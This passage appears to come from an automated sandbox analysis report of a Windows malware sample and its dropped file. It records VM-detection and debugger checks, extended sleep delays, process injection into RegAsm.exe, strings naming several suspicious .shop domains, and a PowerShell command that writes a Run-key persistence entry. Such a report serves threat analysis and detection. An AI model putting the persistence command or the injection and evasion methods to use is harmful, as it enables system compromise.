                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeMemory allocated: 4A30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory allocated: E90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWindow / User API: threadDelayed 3482Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWindow / User API: threadDelayed 6351Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5761Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 430Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 7696Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 7712Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 7716Thread sleep count: 3482 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 7732Thread sleep count: 6351 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 5761 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep count: 430 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe TID: 7804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe TID: 8080Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 1364Thread sleep count: 200 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 1364Thread sleep count: 300 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 2424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7248Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Amcache.hve.17.drBinary or memory string: VMware
                  Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.17.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.17.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.17.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.17.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: 57lklPjdPc.exe, 00000000.00000002.4215656428.0000000005C51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: 57lklPjdPc.exe, 00000000.00000002.4215730628.0000000005C62000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2463427449.0000000001715000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2463427449.0000000001761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.17.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.17.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.17.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.17.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.17.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.17.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.17.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: 57lklPjdPc.exe, 00000000.00000002.4215656428.0000000005C51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                  Source: Amcache.hve.17.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.17.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: 57lklPjdPc.exe, 00000000.00000002.4214856571.0000000005B70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh0
                  Source: Amcache.hve.17.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00439340 LdrInitializeThunk,14_2_00439340
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeCode function: 12_2_02B12145 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,12_2_02B12145
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: l6E.exe, 0000000C.00000002.2322314652.0000000003B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tryyudjasudqo.shop
                  Source: l6E.exe, 0000000C.00000002.2322314652.0000000003B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eemmbryequo.shop
                  Source: l6E.exe, 0000000C.00000002.2322314652.0000000003B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reggwardssdqw.shop
                  Source: l6E.exe, 0000000C.00000002.2322314652.0000000003B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: relaxatinownio.shop
                  Source: l6E.exe, 0000000C.00000002.2322314652.0000000003B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tesecuuweqo.shop
                  Source: l6E.exe, 0000000C.00000002.2322314652.0000000003B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tendencctywop.shop
                  Source: l6E.exe, 0000000C.00000002.2322314652.0000000003B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: licenseodqwmqn.shop
                  Source: l6E.exe, 0000000C.00000002.2322314652.0000000003B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keennylrwmqlw.shop
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 448000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 458000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 115F008Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.bat" "Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" remove-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name '57lklpjdpc';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name '57lklpjdpc' -value '"c:\users\user\appdata\roaming\57lklpjdpc.exe"' -propertytype 'string'
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" remove-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name '57lklpjdpc';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name '57lklpjdpc' -value '"c:\users\user\appdata\roaming\57lklpjdpc.exe"' -propertytype 'string'Jump to behavior
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000034A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\^q
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000034EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q$
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003658000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q\
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000035B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q|
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003748000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q8
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000037E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^qhu~
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003798000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^qt
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.000000000362D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q<c
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000036A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^qL
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.000000000353B000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003605000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^ql
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003680000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q,
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003798000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q(
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.00000000036F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^qH
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeQueries volume information: C:\Users\user\Desktop\57lklPjdPc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
